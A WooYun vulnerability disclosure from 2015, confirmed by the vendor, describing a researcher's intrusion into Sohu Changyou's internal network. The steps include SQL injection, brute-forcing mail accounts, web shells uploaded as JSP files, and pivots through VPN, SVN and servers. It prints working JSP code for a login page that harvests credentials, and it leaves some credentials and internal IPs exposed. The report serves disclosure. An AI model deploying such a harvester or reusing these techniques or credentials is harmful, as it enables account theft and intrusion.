当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130908

漏洞标题:游戏行业安全之搜狐畅游内网可大漫游(大量信息泄漏/服务器权限/可持续APT攻击)

相关厂商:搜狐畅游

漏洞作者: 蓝冰

提交时间:2015-08-01 16:03

修复时间:2015-09-15 18:50

公开时间:2015-09-15 18:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-01: 细节已通知厂商并且等待厂商处理中
2015-08-01: 厂商已经确认,细节仅向厂商公开
2015-08-11: 细节向核心白帽子及相关领域专家公开
2015-08-21: 细节向普通白帽子公开
2015-08-31: 细节向实习白帽子公开
2015-09-15: 细节向公众公开

简要描述:

每一个漫游 都为闪电而努力着 呵呵呵~
审核看完帮打下码哈

详细说明:

0x00
首先搜狐畅游比我想像中要大很多很多,内网权限也分的很细,加上本人正在实习中,每天累成狗,所以没能撸穿,不过感觉持续APT应该没问题 哈哈
0x01
内网入口点:
http://workflow.cyou-inc.com:89/login.do 泛微的OA系统
登录框存在POST注入 但是把select给禁了,但并不妨碍我们获取密码,直接上python脚本

mask 区域 
*****Desktop/py &gt*****
*****min*****
*****n : *****
*****n : *****
*****n : *****
*****n : *****
*****: 8E5*****
*****: 8E5*****
*****: 8E5*****
*****: 8E5*****
*****8E5F3F*****
*****8E5F3F*****
*****8E5F3F*****
*****8E5F3F*****
*****8E5F3F*****
*****5F3FE21*****
*****cod*****


最终 sysadmin的密码为asdf!@#321
用这个密码是登录不了80端的 他们80端设为统一认证,于是首先登录移动端,随后找到一个接口,简单写个脚本 把所有员工的姓名dump下来 然后用在线中文转拼音制作一份用户名字典
接下来该干吗不用多说了吧 嘿嘿嘿
https://mail.cyou-inc.com/
爆破搞起,获取如下

mask 区域 
*****ode*****
*****: Cyou*****
***** abcd.*****
*****: abc*****
***** : abc*****
*****bcd.1*****
***** abcd*****
***** abcd.*****
***** : abc*****
***** abcd*****
*****abcd.*****
***** abcd.*****
*****: abc*****
***** abcd.*****
*****cod*****


下一步登录邮箱找vpn信息,某位同学很友好的把思科的pcf打包好了,随后用邮箱用户密码登录vpn

屏幕快照 2015-08-01 0.23.33.png


0x02
接着继续邮箱信息收集,利用统一认证的优势进入多个系统和服务器

屏幕快照 2015-07-30 2.21.44.png


屏幕快照 2015-07-27 1.16.51.png


屏幕快照 2015-07-27 0.12.34.png


屏幕快照 2015-07-27 0.08.47.png


屏幕快照 2015-07-26 23.46.08.png


屏幕快照 2015-07-26 19.24.20.png

屏幕快照 2015-07-26 19.25.30.png


屏幕快照 2015-07-26 19.04.40.png


屏幕快照 2015-07-26 19.23.49.png


这个系统吊了 可以下载源代码 含各种核心站点源码 包括主站auth.changyou.com的源码 里面各种密码 我就不贴了免的引起不好的影响,不过畅游的权限控制挺严的,有了也连不上

屏幕快照 2015-07-26 19.38.44.png


该系统头像上传处可传一个jsp 成功getshell

屏幕快照 2015-07-27 0.14.22.png


虽然有外网IP但连不上,认证机制也是调用的统一认证,不过幸运的是用户密码是POST提交到这个系统然后由该系统请求LDAP认证,于是把登录页替换掉抓取明文密码

<%@ page import="java.io.*"%> 
<% 
  String username = request.getParameter("userName");
  String password = request.getParameter("password"); 
  RandomAccessFile rf=new RandomAccessFile( "/home/htdocs/ims/ims/auth.txt","rw"); 
  rf.seek(rf.length());
  rf.writeBytes(username+":"+password+"\n"); 
  rf.close();
%> 
<script src="../js/jquery-1.7.2.min.js" type="text/javascript"></script>
<script>
$.post("../ims/login.act", {userName:'<%out.print(username);%>',password:'<%out.print(password);%>'},function(data) {
var a = '<input id="password" tabindex="2" type="password"';
if(data.indexOf(a) > 0 )
{
window.location.href="http://10.127.65.174:8080/ims/login!openLogin.act?errorMessage=3";
}
else
{
window.location.href="http://10.127.65.174:8080/ims/mainMenu!openIndex.act"
}
});
</script>


成功获取到一个密码

mask 区域 
*****ode*****
*****sdJIAN*****
*****cod*****


登录该邮箱获得一个服务器权限

屏幕快照 2015-07-31 21.24.32.png


屏幕快照 2015-07-31 21.24.00.png


可长期APT抓取密码
继续~

10.1.8.214 


mask 区域


*****:db*****
*****h@ngy0*****
*****r/local/r*****
*****h@rge_Ch*****


可以从VPN连到该服务器

屏幕快照 2015-07-30 0.49.17.png


屏幕快照 2015-07-30 0.49.34.png


是EHR DB服务器
下面的是堡垒机

屏幕快照 2015-07-30 10.36.32.png


新密码如下:
用户名:tianlong3d


mask 区域


*****g3d@q14yw*****


屏幕快照 2015-07-30 10.42.04.png


屏幕快照 2015-07-30 22.17.23.png


屏幕快照 2015-07-30 22.19.47.png


0x03
内网第二入口点:
由于VPN限制了很多系统的访问,于是试试能不能在获得一个服务器shell
在偶然的机会登录了OA系统,系统里面有一个旧OA链接系统
URL:http://workflow.cyou-inc.com:1122
该端口上的泛微存在上传漏洞,直接上传一个jsp 成功getshell,随后发现该ip可以访问SVN密码查询系统

屏幕快照 2015-07-30 10.40.21.png


在该服务器上发现一枚LDAP连接信息

mask 区域 
*****ode*****
*****ic=l*****
*****type=*****
*****auto=*****
*****typ*****
*****un.jndi.ldap*****
1.://**.**.**//10.6.125.11:389     _
*****cyou-inc*****
*****l=OAAut*****
*****tials=*****
*****cod*****


屏幕快照 2015-08-01 1.35.47.png


目测畅游的所有域信息都在这里了 不过不存密码 有点悲剧 哈哈
下一步用该服务器代理进内网访问SVN密码查询系统,搞到一批SVN权限

mask 区域 
*****ode*****
*****nji*****
1.svn://**.**.**
2.svn://**.**.**
3.svn://**.**.**
*****ing*****
4.svn://**.**.**
*****ian*****
5.svn://**.**.**
*****ngx*****
6.svn://**.**.**
*****ngg*****
7.svn://**.**.**
*****na*****
8.svn://**.**.**
*****xu*****
9.svn://**.**.**
*****oxi*****
10.svn://**.**.**
11.svn://**.**.**
*****cod*****


邮箱搜集一批svn地址



mask 区域


1.svn://**.**.**/YD/develop_
2.svn://**.**.**/YD/project _
3.svn://**.**.**/YD/testing _
4.svn://**.**.**/YD/product _
**********
*****P
*****
5.svn://**.**.**/PLATFORM/0_Private_
*****维^*****
6.svn://**.**.**/PLATFORM/1_系统运维中心_
*****^^*****
7.svn://**.**.**/PLATFORM/2_用户中心_
*****^^*****
8.svn://**.**.**/PLATFORM/3_数据中心_
*****^^*****
9.svn://**.**.**/PLATFORM/4_技术中心_
*****^^*****
10.svn://**.**.**/PLATFORM/5_(资源中心)/1_翻译部_
*****^^^*****
11.svn://**.**.**/PLATFORM/5_(资源中心)/2_资产管理部_
*****M*****
12.svn://**.**.**/PLATFORM/5_(资源中心)/3_PMO_
**********
13.svn://**.**.**/MLDJClient/MLDJ/OperationMaintenance_
14.svn://**.**.**/pt/pingtaidoc/1项目/11用户中心-基础应用部_
15.svn://**.**.**/Network/bet _
16.svn://**.**.**/Network/poplauncher_
17.svn://**.**.**/VideoIntegration/src 代码库_
18.svn://**.**.**/VideoIntegration/doc文档库_
19.svn://**.**.**/VideoIntegration/res 资源库_
**********
*****^^*****
20.svn://**.**.**/Internet/cypayorder_
*****^AP*****
21.svn://**.**.**/Internet/ cypayopenapi_
*****^*****
22.svn://**.**.**/Internet/cypaystat_
*****^*****
23.svn://**.**.**/Internet/cypayWebPortal_
*****^^*****
24.svn://**.**.**/Internet/operation_manage_
*****^^*****
25.svn://**.**.**/Internet/account/branches/accounts_clearing/accounts_clearing   _
26.svn://**.**.**/Internet/clearing/branches/accounts_orders/accounts_orders     _
27.svn://**.**.**/Internet/account/branches/accounts_balance/accounts_balance_
*****
*****
*****统*****
28.svn://**.**.**/Internet/cypayoa_
*****系*****
29.svn://**.**.**/Internet/cypayconsole _
*****^^*****
30.svn://**.**.**/Internet/cypay_merchant_
*****录^*****
31.svn://**.**.**/Internet/cypaycas_
**********
32.svn://**.**.**/dc_
33.svn://**.**.**/gd_
34.svn://**.**.**/projectx_
35.svn://**.**.**/spec_
36.svn://**.**.**/x_pat







捡到一个桃源GM账号 测试可登录





mask 区域


*****ou.com   j*****


0x04
接着就是checkout svn 获得大量敏感信息.

zabbix监控
http://10.127.2.185/zabbix/index.php
tlbb3d
tlbb3d.mrd


屏幕快照 2015-07-30 23.51.51.png


百度统计

屏幕快照 2015-07-31 0.09.22.png


屏幕快照 2015-07-31 0.10.04.png


拿下又一台服务器

屏幕快照 2015-08-01 0.30.52.png


畅游的服务器列表

屏幕快照 2015-07-31 1.17.56.png


bbs.cy.com的配置信息验证发现UC_KEY跟线上的一样不过可能config文件没有写入权限,不过有了UC_KEY大家都懂的,此外还包含各种站点的源码我就不贴了哈

屏幕快照 2015-07-31 23.25.51.png


风云的GM工具 嘿嘿 看了说明 配置挺麻烦的 还得装一个控件

屏幕快照 2015-07-31 22.57.16.png


GM命令表

屏幕快照 2015-08-01 0.00.00.png


屏幕快照 2015-07-31 23.59.51.png


屏幕快照 2015-07-31 23.59.39.png


这个又吊了 包含了畅游所有正在使用的系统,包含系统URL地址,SVN地址,相关负责人名单
有了这个 加上之前的钓鱼页面 长期APT攻击 获取密码 查SVN密码 登录SVN,登录邮箱,登录堡垒机
撸穿只是时间问题
简单看了这些系统 随手又进入一个系统

屏幕快照 2015-07-31 23.55.11.png

漏洞证明:

已证明

修复方案:

猪一样的队友,还是要加强员工们对密码策略的认识
所有为了证明而获取到的内部信息均已删除 请勿查水表
: )

版权声明:转载请注明来源 蓝冰@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-01 18:49

厂商回复:

正在处理,感谢!

最新状态:

暂无